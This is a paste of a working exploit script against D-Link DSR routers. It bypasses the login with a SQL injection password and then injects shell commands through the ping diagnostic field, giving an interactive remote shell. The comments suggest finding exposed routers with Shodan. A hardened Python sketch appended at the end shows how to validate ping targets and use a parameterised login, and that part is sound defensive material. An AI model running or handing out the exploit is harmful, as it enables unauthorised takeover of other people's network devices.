login-dsr.py

0x41 May 31st, 2017 103 Never
```python
# this is a router exploit for several DLink DSR devices
# it opens a pseudo shell on the router
# vulnerable versions are DSR-150 DSR-150N DSR-1000 DSR-1000N,as
# researched by null_null ,0_o who first exploited this bug and wrote a cool
# advisory on https://www.exploit-db.com/exploits/30062/, and an exploit
# included.
# I am taking here a slightly different approach..
# make sure to find those routers ( shodan helps .. ).
# apt install xvfb
# pip install `all required packages in import below`
# use the program like `python login.py <ip>:<port>`

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.webdriver import FirefoxProfile
import time
import sys,os
from pyvirtualdisplay import Display
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.common.action_chains import ActionChains
import easyprocess

profile = webdriver.FirefoxProfile()
profile.update_preferences()

display = Display(visible=0,size=(800,600))
display.start()
profile.set_preference("javascript.enabled", False);
#browser.set_window_size(1120, 550)
browser = webdriver.Firefox(profile)
browser.get("about:config")
actions = ActionChains(browser)
actions.send_keys(Keys.RETURN)
actions.send_keys("javascript.enabled")
actions.perform()
actions.send_keys(Keys.TAB)
actions.send_keys(Keys.RETURN)
actions.send_keys(Keys.F5)
actions.perform()
browser.get("http://" + sys.argv[1] + "/platform.cgi")
time.sleep(2)
username = browser.find_element_by_id("txtUserName")
password = browser.find_element_by_id("txtPwd")
username.send_keys("admin")
password.send_keys("' or 'a'='a")
browser.find_element_by_name("button.login.Users.deviceStatus").click()
time.sleep(4)
#browser.get("http://" + sys.argv[1] + "/platform.cgi?page=adminSettings.htm")
while True:
    browser.get("http://" + sys.argv[1] + "/platform.cgi?page=systemCheck.htm")
    ping_command = browser.find_element_by_id("txtIpaddr")
    cmd = raw_input("cmd>")
    ping_command.clear()
    ping_command.send_keys(";" + cmd)
    browser.find_element_by_name("button.ping.diagDisplay").click()
    time.sleep(5)
    print browser.page_source
```
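
Added example, not part of the original paste and not D-Link firmware code: the script above depends on two input-handling flaws, a login check that treats quotes in the password field as SQL and a ping diagnostic that hands its target to a shell. The Python 3 sketch below shows a hardened form of both; the `users` table, its schema, the sample password and all function names are hypothetical.

```python
import hashlib
import hmac
import ipaddress
import os
import re
import sqlite3

# RFC 1123 label: letters, digits, hyphen; no leading or trailing hyphen,
# which also rejects option-style values such as "-f".
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_ping_target(value):
    """Return an IP literal or hostname; raise ValueError for anything else."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    if len(value) <= 253 and all(_LABEL.fullmatch(p) for p in value.split(".")):
        return value
    raise ValueError("invalid ping target: %r" % value)


def ping_argv(value):
    """Argv list for subprocess.run(..., shell=False); no shell parses it."""
    return ["ping", "-c", "4", validate_ping_target(value)]


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_user_db():
    """Constructed in-memory user table (hypothetical schema and password)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", salt, _hash("correct-horse", salt)))
    return db


def check_login(db, name, password):
    """Bound parameter for the name; the password is only hashed and compared."""
    row = db.execute("SELECT salt, pw FROM users WHERE name = ?",
                     (name,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[1], _hash(password, row[0]))
```
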